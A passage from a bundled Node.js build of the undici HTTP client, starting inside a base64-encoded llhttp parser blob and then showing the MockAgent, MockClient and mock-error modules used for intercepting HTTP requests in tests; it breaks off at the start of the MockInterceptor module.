C94LnggcmVxdWVzdABJbnZhbGlkIG1ldGhvZCBmb3IgUlRTUC94LnggcmVxdWVzdABFeHBlY3RlZCBTT1VSQ0UgbWV0aG9kIGZvciBJQ0UveC54IHJlcXVlc3QASW52YWxpZCBjaGFyIGluIHVybCBmcmFnbWVudCBzdGFydABFeHBlY3RlZCBkb3QAU3BhbiBjYWxsYmFjayBlcnJvciBpbiBvbl9zdGF0dXMASW52YWxpZCByZXNwb25zZSBzdGF0dXMASW52YWxpZCBjaGFyYWN0ZXIgaW4gY2h1bmsgZXh0ZW5zaW9ucwBVc2VyIGNhbGxiYWNrIGVycm9yAGBvbl9yZXNldGAgY2FsbGJhY2sgZXJyb3IAYG9uX2NodW5rX2hlYWRlcmAgY2FsbGJhY2sgZXJyb3IAYG9uX21lc3NhZ2VfYmVnaW5gIGNhbGxiYWNrIGVycm9yAGBvbl9jaHVua19leHRlbnNpb25fdmFsdWVgIGNhbGxiYWNrIGVycm9yAGBvbl9zdGF0dXNfY29tcGxldGVgIGNhbGxiYWNrIGVycm9yAGBvbl92ZXJzaW9uX2NvbXBsZXRlYCBjYWxsYmFjayBlcnJvcgBgb25fdXJsX2NvbXBsZXRlYCBjYWxsYmFjayBlcnJvcgBgb25fY2h1bmtfY29tcGxldGVgIGNhbGxiYWNrIGVycm9yAGBvbl9oZWFkZXJfdmFsdWVfY29tcGxldGVgIGNhbGxiYWNrIGVycm9yAGBvbl9tZXNzYWdlX2NvbXBsZXRlYCBjYWxsYmFjayBlcnJvcgBgb25fbWV0aG9kX2NvbXBsZXRlYCBjYWxsYmFjayBlcnJvcgBgb25faGVhZGVyX2ZpZWxkX2NvbXBsZXRlYCBjYWxsYmFjayBlcnJvcgBgb25fY2h1bmtfZXh0ZW5zaW9uX25hbWVgIGNhbGxiYWNrIGVycm9yAFVuZXhwZWN0ZWQgY2hhciBpbiB1cmwgc2VydmVyAEludmFsaWQgaGVhZGVyIHZhbHVlIGNoYXIASW52YWxpZCBoZWFkZXIgZmllbGQgY2hhcgBTcGFuIGNhbGxiYWNrIGVycm9yIGluIG9uX3ZlcnNpb24ASW52YWxpZCBtaW5vciB2ZXJzaW9uAEludmFsaWQgbWFqb3IgdmVyc2lvbgBFeHBlY3RlZCBzcGFjZSBhZnRlciB2ZXJzaW9uAEV4cGVjdGVkIENSTEYgYWZ0ZXIgdmVyc2lvbgBJbnZhbGlkIEhUVFAgdmVyc2lvbgBJbnZhbGlkIGhlYWRlciB0b2tlbgBTcGFuIGNhbGxiYWNrIGVycm9yIGluIG9uX3VybABJbnZhbGlkIGNoYXJhY3RlcnMgaW4gdXJsAFVuZXhwZWN0ZWQgc3RhcnQgY2hhciBpbiB1cmwARG91YmxlIEAgaW4gdXJsAEVtcHR5IENvbnRlbnQtTGVuZ3RoAEludmFsaWQgY2hhcmFjdGVyIGluIENvbnRlbnQtTGVuZ3RoAER1cGxpY2F0ZSBDb250ZW50LUxlbmd0aABJbnZhbGlkIGNoYXIgaW4gdXJsIHBhdGgAQ29udGVudC1MZW5ndGggY2FuJ3QgYmUgcHJlc2VudCB3aXRoIFRyYW5zZmVyLUVuY29kaW5nAEludmFsaWQgY2hhcmFjdGVyIGluIGNodW5rIHNpemUAU3BhbiBjYWxsYmFjayBlcnJvciBpbiBvbl9oZWFkZXJfdmFsdWUAU3BhbiBjYWxsYmFjayBlcnJvciBpbiBvbl9jaHVua19leHRlbnNpb25fdmFsdWUASW52YWxpZCBjaGFyYWN0ZXIgaW4gY2h1bmsgZXh0ZW5zaW9ucyB2YWx1ZQBNaXNzaW5nIGV4cGVjdGVkIExGIGFmdGVyIGhlYWRlciB2YWx1ZQBJbnZhbGlkIGBUcmFuc2Zlci1FbmNvZGluZ2AgaGVhZGVyIHZhbHVlAEludmFsaWQgY2hhcmFjdGVyIGluIGNodW5rIGV4dGVuc2lvbnMgcXVvdGUgdmFsdWUASW52YWxpZCBjaGFyYWN0ZXIgaW4gY2h1bmsgZXh0ZW5zaW9ucyBxdW90ZWQgdmFsdWUAUGF1c2VkIGJ5IG9uX2hlYWRlcnNfY29tcGxldGUASW52YWxpZCBFT0Ygc3RhdGUAb25fcmVzZXQgcGF1c2UAb25fY2h1bmtfaGVhZGVyIHBhdXNlAG9uX21lc3NhZ2VfYmVnaW4gcGF1c2UAb25fY2h1bmtfZXh0ZW5zaW9uX3ZhbHVlIHBhdXNlAG9uX3N0YXR1c19jb21wbGV0ZSBwYXVzZQBvbl92ZXJzaW9uX2NvbXBsZXRlIHBhdXNlAG9uX3VybF9jb21wbGV0ZSBwYXVzZQBvbl9jaHVua19jb21wbGV0ZSBwYXVzZQBvbl9oZWFkZXJfdmFsdWVfY29tcGxldGUgcGF1c2UAb25fbWVzc2FnZV9jb21wbGV0ZSBwYXVzZQBvbl9tZXRob2RfY29tcGxldGUgcGF1c2UAb25faGVhZGVyX2ZpZWxkX2NvbXBsZXRlIHBhdXNlAG9uX2NodW5rX2V4dGVuc2lvbl9uYW1lIHBhdXNlAFVuZXhwZWN0ZWQgc3BhY2UgYWZ0ZXIgc3RhcnQgbGluZQBTcGFuIGNhbGxiYWNrIGVycm9yIGluIG9uX2NodW5rX2V4dGVuc2lvbl9uYW1lAEludmFsaWQgY2hhcmFjdGVyIGluIGNodW5rIGV4dGVuc2lvbnMgbmFtZQBQYXVzZSBvbiBDT05ORUNUL1VwZ3JhZGUAUGF1c2Ugb24gUFJJL1VwZ3JhZGUARXhwZWN0ZWQgSFRUUC8yIENvbm5lY3Rpb24gUHJlZmFjZQBTcGFuIGNhbGxiYWNrIGVycm9yIGluIG9uX21ldGhvZABFeHBlY3RlZCBzcGFjZSBhZnRlciBtZXRob2QAU3BhbiBjYWxsYmFjayBlcnJvciBpbiBvbl9oZWFkZXJfZmllbGQAUGF1c2VkAEludmFsaWQgd29yZCBlbmNvdW50ZXJlZABJbnZhbGlkIG1ldGhvZCBlbmNvdW50ZXJlZABVbmV4cGVjdGVkIGNoYXIgaW4gdXJsIHNjaGVtYQBSZXF1ZXN0IGhhcyBpbnZhbGlkIGBUcmFuc2Zlci1FbmNvZGluZ2AAU1dJVENIX1BST1hZAFVTRV9QUk9YWQBNS0FDVElWSVRZAFVOUFJPQ0VTU0FCTEVfRU5USVRZAENPUFkATU9WRURfUEVSTUFORU5UTFkAVE9PX0VBUkxZAE5PVElGWQBGQUlMRURfREVQRU5ERU5DWQBCQURfR0FURVdBWQBQTEFZAFBVVABDSEVDS09VVABHQVRFV0FZX1RJTUVPVVQAUkVRVUVTVF9USU1FT1VUAE5FVFdPUktfQ09OTkVDVF9USU1FT1VUAENPTk5FQ1RJT05fVElNRU9VVABMT0dJTl9USU1FT1VUAE5FVFdPUktfUkVBRF9USU1FT1VUAFBPU1QATUlTRElSRUNURURfUkVRVUVTVABDTElFTlRfQ0xPU0VEX1JFUVVFU1QAQ0xJRU5UX0NMT1NFRF9MT0FEX0JBTEFOQ0VEX1JFUVVFU1QAQkFEX1JFUVVFU1QASFRUUF9SRVFVRVNUX1NFTlRfVE9fSFRUUFNfUE9SVABSRVBPUlQASU1fQV9URUFQT1QAUkVTRVRfQ09OVEVOVABOT19DT05URU5UAFBBUlRJQUxfQ09OVEVOVABIUEVfSU5WQUxJRF9DT05TVEFOVABIUEVfQ0JfUkVTRVQAR0VUAEhQRV9TVFJJQ1QAQ09ORkxJQ1QAVEVNUE9SQVJZX1JFRElSRUNUAFBFUk1BTkVOVF9SRURJUkVDVABDT05ORUNUAE1VTFRJX1NUQVRVUwBIUEVfSU5WQUxJRF9TVEFUVVMAVE9PX01BTllfUkVRVUVTVFMARUFSTFlfSElOVFMAVU5BVkFJTEFCTEVfRk9SX0xFR0FMX1JFQVNPTlMAT1BUSU9OUwBTV0lUQ0hJTkdfUFJPVE9DT0xTAFZBUklBTlRfQUxTT19ORUdPVElBVEVTAE1VTFRJUExFX0NIT0lDRVMASU5URVJOQUxfU0VSVkVSX0VSUk9SAFdFQl9TRVJWRVJfVU5LTk9XTl9FUlJPUgBSQUlMR1VOX0VSUk9SAElERU5USVRZX1BST1ZJREVSX0FVVEhFTlRJQ0FUSU9OX0VSUk9SAFNTTF9DRVJUSUZJQ0FURV9FUlJPUgBJTlZBTElEX1hfRk9SV0FSREVEX0ZPUgBTRVRfUEFSQU1FVEVSAEdFVF9QQVJBTUVURVIASFBFX1VTRVIAU0VFX09USEVSAEhQRV9DQl9DSFVOS19IRUFERVIATUtDQUxFTkRBUgBTRVRVUABXRUJfU0VSVkVSX0lTX0RPV04AVEVBUkRPV04ASFBFX0NMT1NFRF9DT05ORUNUSU9OAEhFVVJJU1RJQ19FWFBJUkFUSU9OAERJU0NPTk5FQ1RFRF9PUEVSQVRJT04ATk9OX0FVVEhPUklUQVRJVkVfSU5GT1JNQVRJT04ASFBFX0lOVkFMSURfVkVSU0lPTgBIUEVfQ0JfTUVTU0FHRV9CRUdJTgBTSVRFX0lTX0ZST1pFTgBIUEVfSU5WQUxJRF9IRUFERVJfVE9LRU4ASU5WQUxJRF9UT0tFTgBGT1JCSURERU4ARU5IQU5DRV9ZT1VSX0NBTE0ASFBFX0lOVkFMSURfVVJMAEJMT0NLRURfQllfUEFSRU5UQUxfQ09OVFJPTABNS0NPTABBQ0wASFBFX0lOVEVSTkFMAFJFUVVFU1RfSEVBREVSX0ZJRUxEU19UT09fTEFSR0VfVU5PRkZJQ0lBTABIUEVfT0sAVU5MSU5LAFVOTE9DSwBQUkkAUkVUUllfV0lUSABIUEVfSU5WQUxJRF9DT05URU5UX0xFTkdUSABIUEVfVU5FWFBFQ1RFRF9DT05URU5UX0xFTkdUSABGTFVTSABQUk9QUEFUQ0gATS1TRUFSQ0gAVVJJX1RPT19MT05HAFBST0NFU1NJTkcATUlTQ0VMTEFORU9VU19QRVJTSVNURU5UX1dBUk5JTkcATUlTQ0VMTEFORU9VU19XQVJOSU5HAEhQRV9JTlZBTElEX1RSQU5TRkVSX0VOQ09ESU5HAEV4cGVjdGVkIENSTEYASFBFX0lOVkFMSURfQ0hVTktfU0laRQBNT1ZFAENPTlRJTlVFAEhQRV9DQl9TVEFUVVNfQ09NUExFVEUASFBFX0NCX0hFQURFUlNfQ09NUExFVEUASFBFX0NCX1ZFUlNJT05fQ09NUExFVEUASFBFX0NCX1VSTF9DT01QTEVURQBIUEVfQ0JfQ0hVTktfQ09NUExFVEUASFBFX0NCX0hFQURFUl9WQUxVRV9DT01QTEVURQBIUEVfQ0JfQ0hVTktfRVhURU5TSU9OX1ZBTFVFX0NPTVBMRVRFAEhQRV9DQl9DSFVOS19FWFRFTlNJT05fTkFNRV9DT01QTEVURQBIUEVfQ0JfTUVTU0FHRV9DT01QTEVURQBIUEVfQ0JfTUVUSE9EX0NPTVBMRVRFAEhQRV9DQl9IRUFERVJfRklFTERfQ09NUExFVEUAREVMRVRFAEhQRV9JTlZBTElEX0VPRl9TVEFURQBJTlZBTElEX1NTTF9DRVJUSUZJQ0FURQBQQVVTRQBOT19SRVNQT05TRQBVTlNVUFBPUlRFRF9NRURJQV9UWVBFAEdPTkUATk9UX0FDQ0VQVEFCTEUAU0VSVklDRV9VTkFWQUlMQUJMRQBSQU5HRV9OT1RfU0FUSVNGSUFCTEUAT1JJR0lOX0lTX1VOUkVBQ0hBQkxFAFJFU1BPTlNFX0lTX1NUQUxFAFBVUkdFAE1FUkdFAFJFUVVFU1RfSEVBREVSX0ZJRUxEU19UT09fTEFSR0UAUkVRVUVTVF9IRUFERVJfVE9PX0xBUkdFAFBBWUxPQURfVE9PX0xBUkdFAElOU1VGRklDSUVOVF9TVE9SQUdFAEhQRV9QQVVTRURfVVBHUkFERQBIUEVfUEFVU0VEX0gyX1VQR1JBREUAU09VUkNFAEFOTk9VTkNFAFRSQUNFAEhQRV9VTkVYUEVDVEVEX1NQQUNFAERFU0NSSUJFAFVOU1VCU0NSSUJFAFJFQ09SRABIUEVfSU5WQUxJRF9NRVRIT0QATk9UX0ZPVU5EAFBST1BGSU5EAFVOQklORABSRUJJTkQAVU5BVVRIT1JJWkVEAE1FVEhPRF9OT1RfQUxMT1dFRABIVFRQX1ZFUlNJT05fTk9UX1NVUFBPUlRFRABBTFJFQURZX1JFUE9SVEVEAEFDQ0VQVEVEAE5PVF9JTVBMRU1FTlRFRABMT09QX0RFVEVDVEVEAEhQRV9DUl9FWFBFQ1RFRABIUEVfTEZfRVhQRUNURUQAQ1JFQVRFRABJTV9VU0VEAEhQRV9QQVVTRUQAVElNRU9VVF9PQ0NVUkVEAFBBWU1FTlRfUkVRVUlSRUQAUFJFQ09ORElUSU9OX1JFUVVJUkVEAFBST1hZX0FVVEhFTlRJQ0FUSU9OX1JFUVVJUkVEAE5FVFdPUktfQVVUSEVOVElDQVRJT05fUkVRVUlSRUQATEVOR1RIX1JFUVVJUkVEAFNTTF9DRVJUSUZJQ0FURV9SRVFVSVJFRABVUEdSQURFX1JFUVVJUkVEAFBBR0VfRVhQSVJFRABQUkVDT05ESVRJT05fRkFJTEVEAEVYUEVDVEFUSU9OX0ZBSUxFRABSRVZBTElEQVRJT05fRkFJTEVEAFNTTF9IQU5EU0hBS0VfRkFJTEVEAExPQ0tFRABUUkFOU0ZPUk1BVElPTl9BUFBMSUVEAE5PVF9NT0RJRklFRABOT1RfRVhURU5ERUQAQkFORFdJRFRIX0xJTUlUX0VYQ0VFREVEAFNJVEVfSVNfT1ZFUkxPQURFRABIRUFEAEV4cGVjdGVkIEhUVFAvAABeEwAAJhMAADAQAADwFwAAnRMAABUSAAA5FwAA8BIAAAoQAAB1EgAArRIAAIITAABPFAAAfxAAAKAVAAAjFAAAiRIAAIsUAABNFQAA1BEAAM8UAAAQGAAAyRYAANwWAADBEQAA4BcAALsUAAB0FAAAfBUAAOUUAAAIFwAAHxAAAGUVAACjFAAAKBUAAAIVAACZFQAALBAAAIsZAABPDwAA1A4AAGoQAADOEAAAAhcAAIkOAABuEwAAHBMAAGYUAABWFwAAwRMAAM0TAABsEwAAaBcAAGYXAABfFwAAIhMAAM4PAABpDgAA2A4AAGMWAADLEwAAqg4AACgXAAAmFwAAxRMAAF0WAADoEQAAZxMAAGUTAADyFgAAcxMAAB0XAAD5FgAA8xEAAM8OAADOFQAADBIAALMRAAClEQAAYRAAADIXAAC7EwAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAgEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAgMCAgICAgAAAgIAAgIAAgICAgICAgICAgAEAAAAAAACAgICAgICAgICAgICAgICAgICAgICAgICAgAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAgICAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAIAAgICAgIAAAICAAICAAICAgICAgICAgIAAwAEAAAAAgICAgICAgICAgICAgICAgICAgICAgICAgIAAAACAgICAgICAgICAgICAgICAgICAgICAgICAgICAgACAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsb3NlZWVwLWFsaXZlAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEBAQEBAQEBAQEBAgEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQFjaHVua2VkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQABAQEBAQAAAQEAAQEAAQEBAQEBAQEBAQAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGVjdGlvbmVudC1sZW5ndGhvbnJveHktY29ubmVjdGlvbgAAAAAAAAAAAAAAAAAAAHJhbnNmZXItZW5jb2RpbmdwZ3JhZGUNCg0KDQpTTQ0KDQpUVFAvQ0UvVFNQLwAAAAAAAAAAAAAAAAECAAEDAAAAAAAAAAAAAAAAAAAAAAAABAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAAAAAAAAAAABAgABAwAAAAAAAAAAAAAAAAAAAAAAAAQBAQUBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAQEAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAAAAAABAAACAAAAAAAAAAAAAAAAAAAAAAAAAwQAAAQEBAQEBAQEBAQEBQQEBAQEBAQEBAQEBAAEAAYHBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQABAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAAAAAAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAgAAAAACAAAAAAAAAAAAAAAAAAAAAAADAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE5PVU5DRUVDS09VVE5FQ1RFVEVDUklCRUxVU0hFVEVBRFNFQVJDSFJHRUNUSVZJVFlMRU5EQVJWRU9USUZZUFRJT05TQ0hTRUFZU1RBVENIR0VPUkRJUkVDVE9SVFJDSFBBUkFNRVRFUlVSQ0VCU0NSSUJFQVJET1dOQUNFSU5ETktDS1VCU0NSSUJFSFRUUC9BRFRQLw==' + + +/***/ }), + +/***/ 1891: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.enumToMap = void 0; +function enumToMap(obj) { + const res = {}; + Object.keys(obj).forEach((key) => { + const value = obj[key]; + if (typeof value === 'number') { + res[key] = value; + } + }); + return res; +} +exports.enumToMap = enumToMap; +//# sourceMappingURL=utils.js.map + +/***/ }), + +/***/ 6771: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kClients } = __nccwpck_require__(2785) +const Agent = __nccwpck_require__(7890) +const { + kAgent, + kMockAgentSet, + kMockAgentGet, + kDispatches, + kIsMockActive, + kNetConnect, + kGetNetConnect, + kOptions, + kFactory +} = __nccwpck_require__(4347) +const MockClient = __nccwpck_require__(8687) +const MockPool = __nccwpck_require__(6193) +const { matchValue, buildMockOptions } = __nccwpck_require__(9323) +const { InvalidArgumentError, UndiciError } = __nccwpck_require__(8045) +const Dispatcher = __nccwpck_require__(412) +const Pluralizer = __nccwpck_require__(8891) +const PendingInterceptorsFormatter = __nccwpck_require__(6823) + +class FakeWeakRef { + constructor (value) { + this.value = value + } + + deref () { + return this.value + } +} + +class MockAgent extends Dispatcher { + constructor (opts) { + super(opts) + + this[kNetConnect] = true + this[kIsMockActive] = true + + // Instantiate Agent and encapsulate + if ((opts && opts.agent && typeof opts.agent.dispatch !== 'function')) { + throw new InvalidArgumentError('Argument opts.agent must implement Agent') + } + const agent = opts && opts.agent ? opts.agent : new Agent(opts) + this[kAgent] = agent + + this[kClients] = agent[kClients] + this[kOptions] = buildMockOptions(opts) + } + + get (origin) { + let dispatcher = this[kMockAgentGet](origin) + + if (!dispatcher) { + dispatcher = this[kFactory](origin) + this[kMockAgentSet](origin, dispatcher) + } + return dispatcher + } + + dispatch (opts, handler) { + // Call MockAgent.get to perform additional setup before dispatching as normal + this.get(opts.origin) + return this[kAgent].dispatch(opts, handler) + } + + async close () { + await this[kAgent].close() + this[kClients].clear() + } + + deactivate () { + this[kIsMockActive] = false + } + + activate () { + this[kIsMockActive] = true + } + + enableNetConnect (matcher) { + if (typeof matcher === 'string' || typeof matcher === 'function' || matcher instanceof RegExp) { + if (Array.isArray(this[kNetConnect])) { + this[kNetConnect].push(matcher) + } else { + this[kNetConnect] = [matcher] + } + } else if (typeof matcher === 'undefined') { + this[kNetConnect] = true + } else { + throw new InvalidArgumentError('Unsupported matcher. Must be one of String|Function|RegExp.') + } + } + + disableNetConnect () { + this[kNetConnect] = false + } + + // This is required to bypass issues caused by using global symbols - see: + // https://github.com/nodejs/undici/issues/1447 + get isMockActive () { + return this[kIsMockActive] + } + + [kMockAgentSet] (origin, dispatcher) { + this[kClients].set(origin, new FakeWeakRef(dispatcher)) + } + + [kFactory] (origin) { + const mockOptions = Object.assign({ agent: this }, this[kOptions]) + return this[kOptions] && this[kOptions].connections === 1 + ? new MockClient(origin, mockOptions) + : new MockPool(origin, mockOptions) + } + + [kMockAgentGet] (origin) { + // First check if we can immediately find it + const ref = this[kClients].get(origin) + if (ref) { + return ref.deref() + } + + // If the origin is not a string create a dummy parent pool and return to user + if (typeof origin !== 'string') { + const dispatcher = this[kFactory]('http://localhost:9999') + this[kMockAgentSet](origin, dispatcher) + return dispatcher + } + + // If we match, create a pool and assign the same dispatches + for (const [keyMatcher, nonExplicitRef] of Array.from(this[kClients])) { + const nonExplicitDispatcher = nonExplicitRef.deref() + if (nonExplicitDispatcher && typeof keyMatcher !== 'string' && matchValue(keyMatcher, origin)) { + const dispatcher = this[kFactory](origin) + this[kMockAgentSet](origin, dispatcher) + dispatcher[kDispatches] = nonExplicitDispatcher[kDispatches] + return dispatcher + } + } + } + + [kGetNetConnect] () { + return this[kNetConnect] + } + + pendingInterceptors () { + const mockAgentClients = this[kClients] + + return Array.from(mockAgentClients.entries()) + .flatMap(([origin, scope]) => scope.deref()[kDispatches].map(dispatch => ({ ...dispatch, origin }))) + .filter(({ pending }) => pending) + } + + assertNoPendingInterceptors ({ pendingInterceptorsFormatter = new PendingInterceptorsFormatter() } = {}) { + const pending = this.pendingInterceptors() + + if (pending.length === 0) { + return + } + + const pluralizer = new Pluralizer('interceptor', 'interceptors').pluralize(pending.length) + + throw new UndiciError(` +${pluralizer.count} ${pluralizer.noun} ${pluralizer.is} pending: + +${pendingInterceptorsFormatter.format(pending)} +`.trim()) + } +} + +module.exports = MockAgent + + +/***/ }), + +/***/ 8687: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { promisify } = __nccwpck_require__(3837) +const Client = __nccwpck_require__(3598) +const { buildMockDispatch } = __nccwpck_require__(9323) +const { + kDispatches, + kMockAgent, + kClose, + kOriginalClose, + kOrigin, + kOriginalDispatch, + kConnected +} = __nccwpck_require__(4347) +const { MockInterceptor } = __nccwpck_require__(410) +const Symbols = __nccwpck_require__(2785) +const { InvalidArgumentError } = __nccwpck_require__(8045) + +/** + * MockClient provides an API that extends the Client to influence the mockDispatches. + */ +class MockClient extends Client { + constructor (origin, opts) { + super(origin, opts) + + if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { + throw new InvalidArgumentError('Argument opts.agent must implement Agent') + } + + this[kMockAgent] = opts.agent + this[kOrigin] = origin + this[kDispatches] = [] + this[kConnected] = 1 + this[kOriginalDispatch] = this.dispatch + this[kOriginalClose] = this.close.bind(this) + + this.dispatch = buildMockDispatch.call(this) + this.close = this[kClose] + } + + get [Symbols.kConnected] () { + return this[kConnected] + } + + /** + * Sets up the base interceptor for mocking replies from undici. + */ + intercept (opts) { + return new MockInterceptor(opts, this[kDispatches]) + } + + async [kClose] () { + await promisify(this[kOriginalClose])() + this[kConnected] = 0 + this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) + } +} + +module.exports = MockClient + + +/***/ }), + +/***/ 888: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { UndiciError } = __nccwpck_require__(8045) + +class MockNotMatchedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, MockNotMatchedError) + this.name = 'MockNotMatchedError' + this.message = message || 'The request does not match any registered mock dispatches' + this.code = 'UND_MOCK_ERR_MOCK_NOT_MATCHED' + } +} + +module.exports = { + MockNotMatchedError +} + + +/***/ }), + +/***/ 410: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { getResponseData, buildKey, addMockDispatch } = __nccwpck_require__(9323) +const { + kDispatches, + kDispatchKey, + kDefaultHeaders, + kDefaultTrailers, + kContentLength, + kMockDispatch +} = __nccwpck_require__(4347) +const { InvalidArgumentError } = __nccwpck_require__(8045) +const { buildURL } = __nccwpck_require__(3983) + +/** + * 